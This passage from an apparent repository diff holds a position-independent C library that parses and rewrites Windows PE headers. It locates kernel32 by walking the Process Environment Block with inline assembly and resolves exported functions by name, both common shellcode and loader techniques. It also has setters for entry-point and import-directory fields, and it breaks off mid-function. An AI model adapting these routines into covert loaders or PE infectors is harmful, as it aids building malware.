#define IMAGE_REL_AMD64_REL32 0x0004 // 32-bit relative address from byte following reloc
#define IMAGE_REL_AMD64_REL32_1 0x0005 // 32-bit relative address from byte distance 1 from reloc
#define IMAGE_REL_AMD64_REL32_3 0x0007 // 32-bit relative address from byte distance 3 from reloc
#define IMAGE_REL_AMD64_REL32_5 0x0009 // 32-bit relative address from byte distance 5 from reloc
#define IMAGE_REL_AMD64_SECREL 0x000B // 32 bit offset from base of section containing target
#define IMAGE_REL_AMD64_SECREL7 0x000C // 7 bit unsigned offset from base of section containing target
#define IMAGE_REL_AMD64_SREL32 0x000E // 32 bit signed span-dependent value emitted into object
#define IMAGE_REL_AMD64_SSPAN32 0x0010 // 32 bit signed span-dependent value applied at link time
#define IMAGE_REL_IA64_IMM14 0x0001
#define IMAGE_REL_IA64_IMM64 0x0003
#define IMAGE_REL_IA64_DIR32 0x0004
#define IMAGE_REL_IA64_PCREL21B 0x0006
#define IMAGE_REL_IA64_PCREL21F 0x0008
#define IMAGE_REL_IA64_LTOFF22 0x000A
#define IMAGE_REL_IA64_SECTION 0x000B
#define IMAGE_REL_IA64_SECREL22 0x000C
#define IMAGE_REL_IA64_SECREL64I 0x000D
#define IMAGE_REL_IA64_SECREL32 0x000E
#define IMAGE_REL_IA64_DIR32NB 0x0010
#define IMAGE_REL_IA64_SREL22 0x0012
#define IMAGE_REL_IA64_SREL32 0x0013
#define IMAGE_REL_IA64_UREL32 0x0014
#define IMAGE_REL_IA64_PCREL60B 0x0016 // If possible, convert to MBB bundle with NOP.B in slot 1
#define IMAGE_REL_IA64_PCREL60F 0x0017 // If possible, convert to MFB bundle with NOP.F in slot 1
#define IMAGE_REL_IA64_PCREL60I 0x0018 // If possible, convert to MIB bundle with NOP.I in slot 1
#define IMAGE_REL_IA64_PCREL60M 0x0019 // If possible, convert to MMB bundle with NOP.M in slot 1
#define IMAGE_REL_IA64_IMMGPREL64 0x001A
#define IMAGE_REL_IA64_TOKEN 0x001B // clr token
#define IMAGE_REL_IA64_GPREL32 0x001C
#define IMAGE_REL_IA64_ADDEND 0x001F
#define IMAGE_REL_CEF_ABSOLUTE 0x0000 // Reference is absolute, no relocation is necessary
#define IMAGE_REL_CEF_ADDR64 0x0002 // 64-bit address (VA).
#define IMAGE_REL_CEF_ADDR32NB 0x0003 // 32-bit address w/o image base (RVA).
#define IMAGE_REL_CEF_SECTION 0x0004 // Section index
#define IMAGE_REL_CEF_TOKEN 0x0006 // 32 bit metadata token
#define IMAGE_REL_CEE_ABSOLUTE 0x0000 // Reference is absolute, no relocation is necessary
#define IMAGE_REL_CEE_ADDR32 0x0001 // 32-bit address (VA).
#define IMAGE_REL_CEE_ADDR64 0x0002 // 64-bit address (VA).
#define IMAGE_REL_CEE_ADDR32NB 0x0003 // 32-bit address w/o image base (RVA).
#define IMAGE_REL_CEE_SECREL 0x0005 // 32 bit offset from base of section containing target
#define IMAGE_REL_CEE_TOKEN 0x0006 // 32 bit metadata token
#define IMAGE_REL_M32R_ADDR32 0x0001 // 32 bit address
#define IMAGE_REL_M32R_ADDR32NB 0x0002 // 32 bit address w/o image base
#define IMAGE_REL_M32R_ADDR24 0x0003 // 24 bit address
#define IMAGE_REL_M32R_PCREL24 0x0005 // 24 bit offset << 2 & sign ext.
#define IMAGE_REL_M32R_PCREL8 0x0007 // 8 bit offset << 2 & sign ext.
#define IMAGE_REL_M32R_REFHALF 0x0008 // 16 MSBs
#define IMAGE_REL_M32R_REFHI 0x0009 // 16 MSBs; adj for LSB sign ext.
#define IMAGE_REL_M32R_REFLO 0x000A // 16 LSBs
#define IMAGE_REL_M32R_PAIR 0x000B // Link HI and LO
#define IMAGE_REL_M32R_SECTION 0x000C // Section table index
#define IMAGE_REL_M32R_SECREL32 0x000D // 32 bit section relative reference
#define IMAGE_REL_M32R_TOKEN 0x000E // clr token
#define IMAGE_REL_EBC_ABSOLUTE 0x0000 // No relocation required
#define IMAGE_REL_EBC_ADDR32NB 0x0001 // 32 bit address w/o image base
#define IMAGE_REL_EBC_REL32 0x0002 // 32-bit relative address from byte following reloc
#define IMAGE_REL_EBC_SECTION 0x0003 // Section table index
#define IMAGE_REL_EBC_SECREL 0x0004 // Offset within section
#define IMAGE_REL_BASED_ABSOLUTE 0
#define IMAGE_REL_BASED_LOW 2
#define IMAGE_REL_BASED_HIGHLOW 3
#define IMAGE_REL_BASED_HIGHADJ 4
#define IMAGE_REL_BASED_MIPS_JMPADDR 5
#define IMAGE_REL_BASED_MIPS_JMPADDR16 9
#define IMAGE_REL_BASED_DIR64 10
#define IMAGE_ARCHIVE_START "!<arch>\n"
#define IMAGE_ARCHIVE_PAD "\n"
#define IMAGE_ARCHIVE_LINKER_MEMBER "/ "
#define IMAGE_ARCHIVE_LONGNAMES_MEMBER "// "
#define IMAGE_SIZEOF_ARCHIVE_MEMBER_HDR 60
#define IMAGE_ORDINAL_FLAG64 0x8000000000000000
#define IMAGE_ORDINAL_FLAG32 0x80000000
#define IMAGE_ORDINAL_FLAG IMAGE_ORDINAL_FLAG64
#define IMAGE_RESOURCE_NAME_IS_STRING 0x80000000
#define IMAGE_DEBUG_TYPE_UNKNOWN 0
typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header
uint16_t e_magic; // Magic number
uint16_t e_cblp; // Bytes on last page of file
uint16_t e_cp; // Pages in file
uint16_t e_crlc; // Relocations
uint16_t e_cparhdr; // Size of header in paragraphs
uint16_t e_minalloc; // Minimum extra paragraphs needed
uint16_t e_maxalloc; // Maximum extra paragraphs needed
uint16_t e_ss; // Initial (relative) SS value
uint16_t e_sp; // Initial SP value
uint16_t e_csum; // Checksum
uint16_t e_ip; // Initial IP value
uint16_t e_cs; // Initial (relative) CS value
uint16_t e_lfarlc; // File address of relocation table
uint16_t e_ovno; // Overlay number
uint16_t e_res[4]; // Reserved words
uint16_t e_oemid; // OEM identifier (for e_oeminfo)
uint16_t e_oeminfo; // OEM information; e_oemid specific
uint16_t e_res2[10]; // Reserved words
uint32_t e_lfanew; // File address of new exe header
} IMAGE_DOS_HEADER ;
typedef struct _IMAGE_FILE_HEADER {
uint16_t Machine;
uint16_t NumberOfSections;
uint32_t TimeDateStamp;
uint32_t PointerToSymbolTable;
uint32_t NumberOfSymbols;
uint16_t SizeOfOptionalHeader;
uint16_t Characteristics;
} IMAGE_FILE_HEADER;
typedef struct _IMAGE_DATA_DIRECTORY {
uint32_t VirtualAddress;
uint32_t Size;
} IMAGE_DATA_DIRECTORY;
typedef struct _IMAGE_OPTIONAL_HEADER {
//
// Standard fields.
//
uint16_t Magic;
uint8_t MajorLinkerVersion;
uint8_t MinorLinkerVersion;
uint32_t SizeOfCode;
uint32_t SizeOfInitializedData;
uint32_t SizeOfUninitializedData;
uint32_t AddressOfEntryPoint;
uint32_t BaseOfCode;
uint32_t BaseOfData;
//
// NT additional fields.
//
uint32_t ImageBase;
uint32_t SectionAlignment;
uint32_t FileAlignment;
uint16_t MajorOperatingSystemVersion;
uint16_t MinorOperatingSystemVersion;
uint16_t MajorImageVersion;
uint16_t MinorImageVersion;
uint16_t MajorSubsystemVersion;
uint16_t MinorSubsystemVersion;
uint32_t Win32VersionValue;
uint32_t SizeOfImage;
uint32_t SizeOfHeaders;
uint32_t CheckSum;
uint16_t Subsystem;
uint16_t DllCharacteristics;
uint32_t SizeOfStackReserve;
uint32_t SizeOfStackCommit;
uint32_t SizeOfHeapReserve;
uint32_t SizeOfHeapCommit;
uint32_t LoaderFlags;
uint32_t NumberOfRvaAndSizes;
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER32;
typedef struct _IMAGE_OPTIONAL_HEADER64 {
uint16_t Magic;
uint8_t MajorLinkerVersion;
uint8_t MinorLinkerVersion;
uint32_t SizeOfCode;
uint32_t SizeOfInitializedData;
uint32_t SizeOfUninitializedData;
uint32_t AddressOfEntryPoint;
uint32_t BaseOfCode;
uint64_t ImageBase;
uint32_t SectionAlignment;
uint32_t FileAlignment;
uint16_t MajorOperatingSystemVersion;
uint16_t MinorOperatingSystemVersion;
uint16_t MajorImageVersion;
uint16_t MinorImageVersion;
uint16_t MajorSubsystemVersion;
uint16_t MinorSubsystemVersion;
uint32_t Win32VersionValue;
uint32_t SizeOfImage;
uint32_t SizeOfHeaders;
uint32_t CheckSum;
uint16_t Subsystem;
uint16_t DllCharacteristics;
uint64_t SizeOfStackReserve;
uint64_t SizeOfStackCommit;
uint64_t SizeOfHeapReserve;
uint64_t SizeOfHeapCommit;
uint32_t LoaderFlags;
uint32_t NumberOfRvaAndSizes;
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER64;
typedef struct _IMAGE_NT_HEADERS64 {
uint32_t Signature;
IMAGE_FILE_HEADER FileHeader;
IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64;
typedef struct _IMAGE_NT_HEADERS {
uint32_t Signature;
IMAGE_FILE_HEADER FileHeader;
IMAGE_OPTIONAL_HEADER32 OptionalHeader;
} IMAGE_NT_HEADERS32;
typedef struct _IMAGE_SECTION_HEADER {
uint8_t Name[IMAGE_SIZEOF_SHORT_NAME];
union {
uint32_t PhysicalAddress;
uint32_t VirtualSize;
} Misc;
uint32_t VirtualAddress;
uint32_t SizeOfRawData;
uint32_t PointerToRawData;
uint32_t PointerToRelocations;
uint32_t PointerToLinenumbers;
uint16_t NumberOfRelocations;
uint16_t NumberOfLinenumbers;
uint32_t Characteristics;
} IMAGE_SECTION_HEADER;
typedef struct _IMAGE_EXPORT_DIRECTORY {
uint32_t Characteristics;
uint32_t TimeDateStamp;
uint16_t MajorVersion;
uint16_t MinorVersion;
uint32_t Name;
uint32_t Base;
uint32_t NumberOfFunctions;
uint32_t NumberOfNames;
uint32_t AddressOfFunctions; // RVA from base of image
uint32_t AddressOfNames; // RVA from base of image
uint32_t AddressOfNameOrdinals; // RVA from base of image
} IMAGE_EXPORT_DIRECTORY;
typedef struct _IMAGE_IMPORT_BY_NAME {
uint16_t Hint;
uint8_t Name[1];
} IMAGE_IMPORT_BY_NAME;
typedef struct _IMAGE_THUNK_DATA64 {
union {
uint64_t ForwarderString; // Puint8_t
uint64_t Function; // PDWORD
uint64_t Ordinal;
uint64_t AddressOfData; // PIMAGE_IMPORT_BY_NAME
} u1;
} IMAGE_THUNK_DATA64;
typedef struct _IMAGE_THUNK_DATA32 {
union {
uint32_t ForwarderString; // Puint8_t
uint32_t Function; // PDWORD
uint32_t Ordinal;
uint32_t AddressOfData; // PIMAGE_IMPORT_BY_NAME
} u1;
} IMAGE_THUNK_DATA32;
typedef struct _IMAGE_IMPORT_DESCRIPTOR {
union {
uint32_t Characteristics; // 0 for terminating null import descriptor
uint32_t OriginalFirstThunk; // RVA to original unbound IAT (PIMAGE_THUNK_DATA)
} u1;
uint32_t TimeDateStamp; // 0 if not bound,
// -1 if bound, and real date\time stamp
// in IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (new BIND)
// O.W. date/time stamp of DLL bound to (Old BIND)
uint32_t ForwarderChain; // -1 if no forwarders
uint32_t Name;
uint32_t FirstThunk; // RVA to IAT (if bound this IAT has actual addresses)
} IMAGE_IMPORT_DESCRIPTOR;
#endif

66
peb.c Normal file
View File

@ -0,0 +1,66 @@
//main.c
#include <stdint.h>
#include "stdfuncs.h"
#include "peb.h"
/************************************************
* returns data taken from the win process *
* environment block reqEntry specifies which *
* information you want to get returned. *
* reqEntry = 1 returns base addr of own proc *
* reqEntry = 0 returns baddr of kernel32/base *
************************************************/
void *get_peb_data(int reqEntry) {
void *kernelMz;
peb *peb;
ldr_data_table_entry *ldte;
char kernelName[50];
#if defined(__amd64__)
#define KERNELNAME_LEN 10
__asm__("mov %%fs:0x60, %0;\r\n"
: "=r" (peb)
:
: "rax");
kernelName[0] = 'K';
kernelName[1] = 'E';
kernelName[2] = 'R';
kernelName[3] = 'N';
kernelName[4] = 'E';
kernelName[5] = 'L';
kernelName[6] = 'B';
kernelName[7] = 'A';
kernelName[8] = 'S';
kernelName[9] = 'E';
#else
#define KERNELNAME_LEN 8
__asm__("mov %%fs:0x30, %0;"
: "=r" (peb)
:
: "eax");
kernelName[0] = 'K';
kernelName[1] = 'E';
kernelName[2] = 'R';
kernelName[3] = 'N';
kernelName[4] = 'E';
kernelName[5] = 'L';
kernelName[6] = '3';
kernelName[7] = '2';
#endif
if (reqEntry == 0) {
ldte = (ldr_data_table_entry *)peb->pLdr->InInitializationOrderModuleList.next;
while (-1 == ascii_ucode_find(kernelName, ldte->BaseDllName, KERNELNAME_LEN))
ldte = (ldr_data_table_entry *)ldte->InInitializationOrderModuleList.next;
return ldte->DllBase;
}
if (reqEntry == 1) {
return peb->lpImageBaseAddress;
}
return 0;
}

52
peb.h Normal file
View File

@ -0,0 +1,52 @@
#ifndef PEB
#define PEB 1
#include <stdint.h>
void *get_peb_data(int reqEntry);
typedef struct _list_entry
{
void *next;
void *prev;
} list_entry;
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
{
uint32_t dwLength;
uint32_t dwInitialized;
void * lpSsHandle;
list_entry InLoadOrderModuleList;
list_entry InMemoryOrderModuleList;
list_entry InInitializationOrderModuleList;
void * lpEntryInProgress;
} peb_ldr_data;
typedef struct __PEB // 65 elements, 0x210 bytes
{
uint8_t bInheritedAddressSpace;
uint8_t bReadImageFileExecOptions;
uint8_t bBeingDebugged;
uint8_t bSpareBool;
void * lpMutant;
void * lpImageBaseAddress;
peb_ldr_data *pLdr;
} peb;
typedef struct _LDR_DATA_TABLE_ENTRY
{
//list_entry InLoadOrderLinks;
//list_entry InMemoryOrderModuleList;
/* we set the struct here: */
list_entry InInitializationOrderModuleList;
void * DllBase;
void * EntryPoint;
unsigned long SizeOfImage;
void * FullDllName;
void * BaseDllName;
unsigned long Flags;
uint16_t LoadCount;
uint16_t TlsIndex;
list_entry HashTableEntry;
unsigned long TimeDateStamp;
} ldr_data_table_entry;
#endif

BIN
pic-peter/.pe.h.swp Normal file
View File

Binary file not shown.

BIN
pic-peter/.sections.c.swo Normal file
View File

Binary file not shown.

BIN
pic-peter/.sections.c.swp Normal file
View File

Binary file not shown.

BIN
pic-peter/.sections.h.swp Normal file
View File

Binary file not shown.

73
pic-peter/exports.c Normal file
View File

@ -0,0 +1,73 @@
//License: GPLv3.0
#include "exports.h"
uint16_t exports_get_ordinal_by_name(void *image, const char *name)
{
hdrs h;
IMAGE_EXPORT_DIRECTORY *exDir;
uint32_t *ent; //name table
uint16_t *eot; //ordinal table
hdrs_init(&h, image);
exDir = (IMAGE_EXPORT_DIRECTORY *)
rva_to_ptr(image, hdrs_get_export_directory(&h));
ent = (uint32_t *)rva_to_ptr(image, exDir->AddressOfNames);
eot = (uint16_t *)rva_to_ptr(image, exDir->AddressOfNameOrdinals);
for (int i = 0; i < exDir->NumberOfNames; i++)
{
if (0 == pic_strncmp(rva_to_ptr(image, ent[i]), name, pic_strlen(name)))
return eot[i];
}
return -1;
}
/////////////////////////////////////////////////
void *exports_get_function_by_ordinal(void *image, uint32_t ord)
{
IMAGE_EXPORT_DIRECTORY *exDir;
hdrs h;
uint32_t *eft; //export function table
hdrs_init(&h, image);
exDir = (IMAGE_EXPORT_DIRECTORY *)
rva_to_ptr(image, hdrs_get_export_directory(&h));
eft = (uint32_t *)rva_to_ptr(image, exDir->AddressOfFunctions);
return rva_to_ptr(image, eft[ord]);
}
/////////////////////////////////////////////////
void *exports_get_function_by_name(void *image, const char *name)
{
IMAGE_EXPORT_DIRECTORY *exDir;
hdrs h;
uint32_t *eft; //export function table
hdrs_init(&h, image);
exDir = (IMAGE_EXPORT_DIRECTORY *)
rva_to_ptr(image, hdrs_get_export_directory(&h));
eft = (uint32_t *)rva_to_ptr(image, exDir->AddressOfFunctions);
return rva_to_ptr(image, eft[exports_get_ordinal_by_name(image, name)]);
}
/////////////////////////////////////////////////
char *exports_get_name_by_index(void *image, const uint32_t idx)
{
IMAGE_EXPORT_DIRECTORY *exDir;
hdrs h;
uint32_t *ent;
hdrs_init(&h, image);
exDir = (IMAGE_EXPORT_DIRECTORY *)
rva_to_ptr(image, hdrs_get_export_directory(&h));
ent = (uint32_t *)rva_to_ptr(image, exDir->AddressOfNames);
if (idx >= exDir->NumberOfNames) return NULL;
return (char *)rva_to_ptr(image, ent[idx]);
}
/////////////////////////////////////////////////

36
pic-peter/exports.h Normal file
View File

@ -0,0 +1,36 @@
//License: GPLv3.0
/*! \file exports.h
\brief These functions can be used to get information from a PE files export header.
*/
#include "hdrs.h"
#include "sections.h"
#include "misc.h"
/*! \fn uint16_t exports_get_ordinal_by_name(void *image, const char *name)
\brief returns the ordinal for the function you name
\param image is a pointer to the first byte of the image you want to analyze
\param name is a pointer on the name of the function you want to get the ordinal of
*/
uint16_t exports_get_ordinal_by_name(void *image, const char *name);
/*! \fn void *exports_get_function_by_name(void *image, const char *name)
\brief returns a functions address
\param image is a pointer to the pe image you want to analyze
\param name is a pointer on the name of the API function you want the address of
*/
void *exports_get_function_by_name(void *image, const char *name);
/*! \fn char *exports_get_name_by_index(void *image, const uint32_t idx)
\brief returns the first function name in the export headerif idx = 0, the second if idx = 1 and so on
\param image is a pointer on the pe image
\param idx is 0 for the first name and so on... (like an array index)
*/
char *exports_get_name_by_index(void *image, const uint32_t idx);
/*! \fn void *exports_get_function_by_ordinal(void *image, uint32_t ord)
\brief you give it an ordinal and you get a pointer to a function
\param image <-- like above
\param ord should be one of the values you can find in the odinal list
of the PEs export table.
*/
void *exports_get_function_by_ordinal(void *image, uint32_t ord);

453
pic-peter/hdrs.c Normal file
View File

@ -0,0 +1,453 @@
//License: GPLv3.0
#include "hdrs.h"
int hdrs_init(hdrs *self, void *image)
{
self->dos = (IMAGE_DOS_HEADER *)image;
if (IMAGE_DOS_SIGNATURE != self->dos->e_magic)
return -1;
self->nt = (IMAGE_NT_HEADERS32*)&((char*)image)[self->dos->e_lfanew];
if (IMAGE_NT_SIGNATURE != ((IMAGE_NT_HEADERS32*)self->nt)->Signature)
return -1;
self->file = &((IMAGE_NT_HEADERS32*)self->nt)->FileHeader;
self->opt = &((IMAGE_NT_HEADERS32*)self->nt)->OptionalHeader;
if (*(uint16_t *)self->opt == 0x20b)
self->type = 64;
else
self->type = 32;
return 0;
}
/////////////////////////////////////////////////
//set and get functions for the file header //
/////////////////////////////////////////////////
/////////////////////////////////////////////////
uint16_t hdrs_get_machine_type(hdrs *self)
{
return self->file->Machine;
}
/////////////////////////////////////////////////
uint16_t hdrs_get_number_of_sections(hdrs *self)
{
return self->file->NumberOfSections;
}
/////////////////////////////////////////////////
void hdrs_set_number_of_sections(hdrs *self, uint16_t setVal)
{
self->file->NumberOfSections = setVal;
}
/////////////////////////////////////////////////
uint32_t hdrs_get_time_date_stamp(hdrs *self)
{
return self->file->TimeDateStamp;
}
/////////////////////////////////////////////////
void hdrs_set_time_date_stamp(hdrs *self, uint32_t setVal)
{
self->file->TimeDateStamp = setVal;
}
/////////////////////////////////////////////////
uint32_t hdrs_get_pointer_to_symbol_table(hdrs *self)
{
return self->file->PointerToSymbolTable;
}
/////////////////////////////////////////////////
void hdrs_set_pointer_to_symbol_table(hdrs *self, uint32_t setVal)
{
self->file->PointerToSymbolTable = setVal;
}
/////////////////////////////////////////////////
uint32_t hdrs_get_number_of_symbols(hdrs *self)
{
return self->file->NumberOfSymbols;
}
/////////////////////////////////////////////////
void hdrs_set_number_of_symbold(hdrs *self, uint32_t setVal)
{
self->file->NumberOfSymbols = setVal;
}
/////////////////////////////////////////////////
uint16_t hdrs_get_size_of_optional_header(hdrs *self)
{
return self->file->SizeOfOptionalHeader;
}
/////////////////////////////////////////////////
void hdrs_set_size_of_optional_header(hdrs *self, uint16_t setVal)
{
self->file->SizeOfOptionalHeader = setVal;
}
/////////////////////////////////////////////////
uint16_t hdrs_get_characteristics(hdrs *self)
{
return self->file->Characteristics;
}
/////////////////////////////////////////////////
void hdrs_set_characteristics(hdrs *self, uint16_t setVal)
{
self->file->Characteristics = setVal;
}
/////////////////////////////////////////////////
// set and get functions for the optional hdr //
/////////////////////////////////////////////////
uint32_t hdrs_get_size_of_code(hdrs *self)
{
return ((IMAGE_OPTIONAL_HEADER32*)self->opt)->SizeOfCode;
}
/////////////////////////////////////////////////
void hdrs_set_size_of_code(hdrs *self, uint32_t setVal)
{
((IMAGE_OPTIONAL_HEADER32*)self->opt)->SizeOfCode = setVal;
}
/////////////////////////////////////////////////
uint32_t hdrs_get_size_of_initialized_data(hdrs *self)
{
return ((IMAGE_OPTIONAL_HEADER32*)self->opt)->SizeOfInitializedData;
}
/////////////////////////////////////////////////
void hdrs_set_size_of_initialized_data(hdrs *self, uint32_t setVal)
{
((IMAGE_OPTIONAL_HEADER32*)self->opt)->SizeOfInitializedData = setVal;
}
/////////////////////////////////////////////////
uint32_t hdrs_get_size_of_uninitialized_data(hdrs *self)
{
return ((IMAGE_OPTIONAL_HEADER32*)self->opt)->SizeOfUninitializedData;
}
/////////////////////////////////////////////////
void hdrs_set_size_of_uninitialized_data(hdrs *self, uint32_t setVal)
{
((IMAGE_OPTIONAL_HEADER32*)self->opt)->SizeOfUninitializedData = setVal;
}
/////////////////////////////////////////////////
uint32_t hdrs_get_address_of_entry_point(hdrs *self)
{
return ((IMAGE_OPTIONAL_HEADER32*)self->opt)->AddressOfEntryPoint;
}
/////////////////////////////////////////////////
void hdrs_set_address_of_entry_point(hdrs *self, uint32_t setVal)
{
((IMAGE_OPTIONAL_HEADER32*)self->opt)->AddressOfEntryPoint = setVal;
}
/////////////////////////////////////////////////
uint32_t hdrs_get_base_of_code(hdrs *self)
{
return ((IMAGE_OPTIONAL_HEADER32*)self->opt)->BaseOfCode;
}
/////////////////////////////////////////////////
void hdrs_set_base_of_code(hdrs *self, uint32_t setVal)
{
((IMAGE_OPTIONAL_HEADER32*)self->opt)->BaseOfCode = setVal;
}
/////////////////////////////////////////////////
uint32_t hdrs_get_base_of_data(hdrs *self)
{
return ((IMAGE_OPTIONAL_HEADER32*)self->opt)->BaseOfData;
}
/////////////////////////////////////////////////
void hdrs_set_base_of_data(hdrs *self, uint32_t setVal)
{
((IMAGE_OPTIONAL_HEADER32*)self->opt)->BaseOfData = setVal;
}
/////////////////////////////////////////////////
uint64_t hdrs_get_image_base(hdrs *self)
{
if (64 == self->type)
return ((IMAGE_OPTIONAL_HEADER64*)self->opt)->ImageBase;
else if (32 == self->type)
return (uint64_t)((IMAGE_OPTIONAL_HEADER32*)self->opt)->ImageBase;
return 0;
}
/////////////////////////////////////////////////
void hdrs_set_image_base(hdrs *self, uint64_t setVal)
{
if (64 == self->type)
((IMAGE_OPTIONAL_HEADER64*)self->opt)->ImageBase = setVal;
else if (32 == self->type)
((IMAGE_OPTIONAL_HEADER32*)self->opt)->ImageBase = (uint32_t)setVal;
return;
}
/////////////////////////////////////////////////
uint32_t hdrs_get_section_alignment(hdrs *self)
{
if (64 == self->type)
return ((IMAGE_OPTIONAL_HEADER64*)self->opt)->SectionAlignment;
else if (32 == self->type)
return ((IMAGE_OPTIONAL_HEADER32*)self->opt)->SectionAlignment;
return 0;
}
/////////////////////////////////////////////////
void hdrs_set_section_alignment(hdrs *self, uint32_t setVal)
{
if (64 == self->type)
((IMAGE_OPTIONAL_HEADER64*)self->opt)->SectionAlignment = setVal;
else if (32 == self->type)
((IMAGE_OPTIONAL_HEADER32*)self->opt)->SectionAlignment = setVal;
return;
}
/////////////////////////////////////////////////
uint32_t hdrs_get_file_alignment(hdrs *self)
{
if (64 == self->type)
return ((IMAGE_OPTIONAL_HEADER64*)self->opt)->FileAlignment;
else if (32 == self->type)
return ((IMAGE_OPTIONAL_HEADER32*)self->opt)->FileAlignment;
return 0;
}
/////////////////////////////////////////////////
void hdrs_set_file_alignment(hdrs *self, uint32_t setVal)
{
if (64 == self->type)
((IMAGE_OPTIONAL_HEADER64*)self->opt)->FileAlignment = setVal;
else if (32 == self->type)
((IMAGE_OPTIONAL_HEADER32*)self->opt)->FileAlignment = setVal;
return;
}
/////////////////////////////////////////////////
uint32_t hdrs_get_size_of_image(hdrs *self)
{
if (64 == self->type)
return ((IMAGE_OPTIONAL_HEADER64*)self->opt)->SizeOfImage;
else if (32 == self->type)
return ((IMAGE_OPTIONAL_HEADER32*)self->opt)->SizeOfImage;
return 0;
}
/////////////////////////////////////////////////
void hdrs_set_size_of_image(hdrs *self, uint32_t setVal)
{
if (64 == self->type)
((IMAGE_OPTIONAL_HEADER64*)self->opt)->SizeOfImage = setVal;
else if (32 == self->type)
((IMAGE_OPTIONAL_HEADER32*)self->opt)->SizeOfImage = setVal;
return;
}
/////////////////////////////////////////////////
uint32_t hdrs_get_checksum(hdrs *self)
{
if (64 == self->type)
return ((IMAGE_OPTIONAL_HEADER64*)self->opt)->CheckSum;
else if (32 == self->type)
return ((IMAGE_OPTIONAL_HEADER32*)self->opt)->CheckSum;
return 0;
}
/////////////////////////////////////////////////
void hdrs_set_checksum(hdrs *self, uint32_t setVal)
{
if (64 == self->type)
((IMAGE_OPTIONAL_HEADER64*)self->opt)->CheckSum = setVal;
else if (32 == self->type)
((IMAGE_OPTIONAL_HEADER32*)self->opt)->CheckSum = setVal;
return;
}
/////////////////////////////////////////////////
uint32_t hdrs_get_number_of_rva_and_sizes(hdrs *self)
{
if (64 == self->type)
return ((IMAGE_OPTIONAL_HEADER64*)self->opt)->NumberOfRvaAndSizes;
else if (32 == self->type)
return ((IMAGE_OPTIONAL_HEADER32*)self->opt)->NumberOfRvaAndSizes;
return 0;
}
/////////////////////////////////////////////////
void hdrs_set_number_of_rva_and_sizes(hdrs *self, uint32_t setVal)
{
if (64 == self->type)
((IMAGE_OPTIONAL_HEADER64*)self->opt)->NumberOfRvaAndSizes = setVal;
else if (32 == self->type)
((IMAGE_OPTIONAL_HEADER32*)self->opt)->NumberOfRvaAndSizes = setVal;
return;
}
/////////////////////////////////////////////////
//other functions
IMAGE_SECTION_HEADER *hdrs_get_first_section_header(hdrs *self)
{
void *ptr = (void *)self->dos;
ptr += self->dos->e_lfanew;
if (64 == self->type)
ptr += sizeof(IMAGE_NT_HEADERS64);
else if (32 == self->type)
ptr += sizeof(IMAGE_NT_HEADERS32);
return (IMAGE_SECTION_HEADER*)ptr;
}
////////////////////////////////////////////////
uint32_t hdrs_get_first_import_descriptor_rva(hdrs *self)
{
if (64 == self->type)
return ((IMAGE_OPTIONAL_HEADER64 *)self->opt)->
DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
return ((IMAGE_OPTIONAL_HEADER32 *)self->opt)->
DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
}
/////////////////////////////////////////////////
void hdrs_set_data_directory_import(hdrs *self,
IMAGE_DATA_DIRECTORY *setVal)
{
if (64 == self->type)
pic_memcpy(&((IMAGE_OPTIONAL_HEADER64 *)self->opt)
->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT],
setVal, sizeof (IMAGE_DATA_DIRECTORY));
else
pic_memcpy(&((IMAGE_OPTIONAL_HEADER32 *)self->opt)
->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT],
setVal, sizeof (IMAGE_DATA_DIRECTORY));
return;
}
/////////////////////////////////////////////////
void hdrs_set_data_directory_iat(hdrs *self,
IMAGE_DATA_DIRECTORY *setVal)
{
if (64 == self->type)
pic_memcpy(&((IMAGE_OPTIONAL_HEADER64 *)self->opt)
->DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT],
setVal, sizeof (IMAGE_DATA_DIRECTORY));
else
pic_memcpy(&((IMAGE_OPTIONAL_HEADER32 *)self->opt)
->DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT],
setVal, sizeof (IMAGE_DATA_DIRECTORY));
return;
}
/////////////////////////////////////////////////
uint32_t hdrs_get_load_cfg_rva(hdrs *self)
{
if (64 == self->type)
return ((IMAGE_OPTIONAL_HEADER64 *)self->opt)
->DataDirectory[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG]
.VirtualAddress;
else
return ((IMAGE_OPTIONAL_HEADER32 *)self->opt)
->DataDirectory[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG]
.VirtualAddress;
}
/////////////////////////////////////////////////
uint32_t hdrs_get_load_cfg_size(hdrs *self)
{
if (64 == self->type)
return ((IMAGE_OPTIONAL_HEADER64 *)self->opt)
->DataDirectory[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG]
.Size;
else
return ((IMAGE_OPTIONAL_HEADER32 *)self->opt)
->DataDirectory[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG]
.Size;
}
/////////////////////////////////////////////////
void hdrs_set_data_directory_load_cfg(hdrs *self,
IMAGE_DATA_DIRECTORY *setVal)
{
if (64 == self->type)
pic_memcpy(&((IMAGE_OPTIONAL_HEADER64 *)self->opt)
->DataDirectory[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG],
setVal, sizeof (IMAGE_DATA_DIRECTORY));
else
pic_memcpy(&((IMAGE_OPTIONAL_HEADER32 *)self->opt)
->DataDirectory[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG],
setVal, sizeof (IMAGE_DATA_DIRECTORY));
return;
}
/////////////////////////////////////////////////
uint32_t hdrs_get_export_directory(hdrs *self)
{
if (64 == self->type)
return ((IMAGE_OPTIONAL_HEADER64 *)self->opt)->
DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
return ((IMAGE_OPTIONAL_HEADER32 *)self->opt)->
